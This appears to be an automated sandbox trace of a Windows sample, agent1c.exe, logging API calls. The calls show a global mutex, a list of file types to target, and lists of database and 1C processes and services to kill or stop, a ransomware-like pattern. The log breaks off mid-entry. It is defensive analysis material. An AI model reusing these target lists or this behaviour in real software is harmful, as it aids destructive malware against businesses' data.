# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jun 6 2019 12:21:16 # Log Creation Date: 16.06.2019 17:55:05.482 Process: id = "1" image_name = "agent1c.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\agent1c.exe" page_root = "0x4debf000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\agent1c.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa74 [0026.320] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0026.321] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76c34173 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceFrequency") returned 0x76c341f0 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="GetVolumeInformationW") returned 0x76c4c860 [0026.322] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="CreatePipe") returned 0x76cb415b [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleInformation") returned 0x76c4195c [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringA") returned 0x76c33c5a [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0026.323] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0026.323] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000 [0027.725] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="OpenProcessToken") returned 0x74d54304 [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="GetTokenInformation") returned 0x74d5431c [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64 [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144 [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86 [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="EnumDependentServicesW") returned 0x74d41e3a [0027.726] GetProcAddress (hModule=0x74d40000, lpProcName="EnumServicesStatusExW") returned 0x74d4b466 [0027.726] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74f40000 [0028.658] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0028.658] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0030.492] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0030.492] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0030.492] GetProcAddress (hModule=0x77130000, lpProcName="NtQuerySystemInformation") returned 0x7714fda0 [0030.492] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74b50000 [0030.578] GetProcAddress (hModule=0x74b50000, lpProcName="WNetCloseEnum") returned 0x74b52dd6 [0030.578] GetProcAddress (hModule=0x74b50000, lpProcName="WNetOpenEnumW") returned 0x74b52f06 [0030.578] GetProcAddress (hModule=0x74b50000, lpProcName="WNetEnumResourceW") returned 0x74b53058 [0030.578] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75bc0000 [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="WSAStartup") returned 0x75bc3ab2 [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="socket") returned 0x75bc3eb8 [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="recv") returned 0x75bc6b0e [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="connect") returned 0x75bc6bdd [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="closesocket") returned 0x75bc3918 [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="gethostbyname") returned 0x75bd7673 [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="inet_addr") returned 0x75bc311b [0030.753] GetProcAddress (hModule=0x75bc0000, lpProcName="ntohl") returned 0x75bc2d57 [0030.754] GetProcAddress (hModule=0x75bc0000, lpProcName="htonl") returned 0x75bc2d57 [0030.754] GetProcAddress (hModule=0x75bc0000, lpProcName="htons") returned 0x75bc2d8b [0030.754] GetProcessHeap () returned 0x5f0000 [0030.754] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x6040d0 [0030.754] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=15106276764) returned 1 [0030.754] GetTickCount () returned 0x18111 [0030.754] GetCurrentProcessId () returned 0xa70 [0030.755] GetTickCount () returned 0x18111 [0030.755] GetTickCount () returned 0x18111 [0030.755] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x6040f8 [0030.755] GetVersion () returned 0x1db10106 [0030.755] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7) returned 0x5f36b8 [0030.755] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x600bd8 [0030.755] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x600bd8, Size=0x20) returned 0x604148 [0030.755] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604148, Size=0x40) returned 0x6046b8 [0030.755] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x604908 [0030.755] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_WRZB2LA") returned 0x0 [0030.755] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_WRZB2LA") returned 0x84 [0030.755] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f36b8 | out: hHeap=0x5f0000) returned 1 [0030.755] lstrlenW (lpString="Global\\syncronize_") returned 18 [0030.755] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6046b8 | out: hHeap=0x5f0000) returned 1 [0030.755] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7) returned 0x5f36b8 [0030.755] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x600bd8 [0030.756] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x600bd8, Size=0x20) returned 0x604148 [0030.756] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604148, Size=0x40) returned 0x6046b8 [0030.756] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x614910 [0030.756] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_WRZB2LU") returned 0x0 [0030.756] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_WRZB2LU") returned 0x88 [0030.756] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f36b8 | out: hHeap=0x5f0000) returned 1 [0030.756] lstrlenW (lpString="Global\\syncronize_") returned 18 [0030.756] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6046b8 | out: hHeap=0x5f0000) returned 1 [0030.756] GetVersion () returned 0x1db10106 [0030.756] GetCurrentProcess () returned 0xffffffff [0030.756] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0030.756] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0030.756] CloseHandle (hObject=0x8c) returned 1 [0030.756] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0030.756] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x3e8) returned 0x0 [0030.756] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x5f36b8 [0030.756] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x600bd8 [0030.756] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x600bd8, Size=0x20) returned 0x604148 [0030.756] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604148, Size=0x40) returned 0x6046b8 [0030.756] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6046b8, Size=0x80) returned 0x6046b8 [0030.756] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6046b8, Size=0x100) returned 0x6046b8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x34) returned 0x6047c0 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x6007c8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x6007d8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x6007e8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x600bd8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x604800 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x600bf0 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604800, Size=0x8) returned 0x604800 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x600c08 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604800, Size=0x10) returned 0x604800 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x600c20 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x600c38 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604800, Size=0x20) returned 0x604800 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x600c50 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x600c68 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6007c8, Size=0x8) returned 0x6007c8 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6007d8, Size=0x8) returned 0x6007d8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x604828 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x600c80 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x604838 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x600c98 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604838, Size=0x8) returned 0x604838 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624930 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604838, Size=0x10) returned 0x604838 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624948 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x604850 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604838, Size=0x20) returned 0x604860 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6007c8, Size=0x10) returned 0x604838 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6007d8, Size=0x10) returned 0x604888 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x6007c8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x624960 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x6007d8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624978 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6007d8, Size=0x8) returned 0x6007d8 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x6048a0 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x624990 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x6048b0 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6249a8 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6048b0, Size=0x8) returned 0x6048b0 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604838, Size=0x20) returned 0x624d18 [0030.757] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604888, Size=0x20) returned 0x624d40 [0030.757] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x604888 [0030.758] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x6249c0 [0030.758] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x604838 [0030.758] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6249d8 [0030.758] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604838, Size=0x8) returned 0x604838 [0030.758] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x624d68 [0030.758] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x624d88 [0030.758] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0030.758] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6046b8 | out: hHeap=0x5f0000) returned 1 [0030.758] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fdf0 | out: lpWSAData=0x18fdf0) returned 0 [0030.766] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6249f0 [0030.766] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6249f0, Size=0x20) returned 0x604350 [0030.766] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604350, Size=0x40) returned 0x604710 [0030.766] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x80) returned 0x604710 [0030.766] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x100) returned 0x625060 [0030.766] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6249f0 [0030.766] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6249f0, Size=0x20) returned 0x604350 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604350, Size=0x40) returned 0x604710 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x80) returned 0x604710 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x100) returned 0x625168 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x6249f0 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x604710 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x8) returned 0x604710 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x604720 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x10) returned 0x604740 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x604758 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x604350 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604740, Size=0x20) returned 0x604778 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1c) returned 0x604378 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x16) returned 0x6047a0 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x6043a0 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x624a20 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x604710 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x625270 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x8) returned 0x604710 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3c) returned 0x6252b8 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604710, Size=0x10) returned 0x604740 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x625300 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x625320 [0030.767] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604740, Size=0x20) returned 0x625340 [0030.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x625368 [0030.767] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0030.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625060 | out: hHeap=0x5f0000) returned 1 [0030.767] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0030.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625168 | out: hHeap=0x5f0000) returned 1 [0030.767] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6258e8 [0030.789] EnumServicesStatusExW (in: hSCManager=0x6258e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 0 [0030.790] GetLastError () returned 0xea [0030.790] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11e4) returned 0x6291e8 [0030.790] EnumServicesStatusExW (in: hSCManager=0x6258e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6291e8, cbBufSize=0x11e4, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6291e8, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 1 [0030.791] CloseServiceHandle (hSCObject=0x6258e8) returned 1 [0030.795] lstrlenW (lpString="Appinfo") returned 7 [0030.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0030.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0030.795] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0030.795] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0030.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0030.795] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0030.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0030.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0030.795] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0030.795] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0030.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0030.795] lstrlenW (lpString="AudioSrv") returned 8 [0030.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0030.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0030.795] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0030.795] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0030.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0030.795] lstrlenW (lpString="BFE") returned 3 [0030.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0030.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0030.795] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0030.795] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0030.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0030.796] lstrlenW (lpString="CryptSvc") returned 8 [0030.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0030.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0030.796] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0030.796] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0030.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0030.796] lstrlenW (lpString="CscService") returned 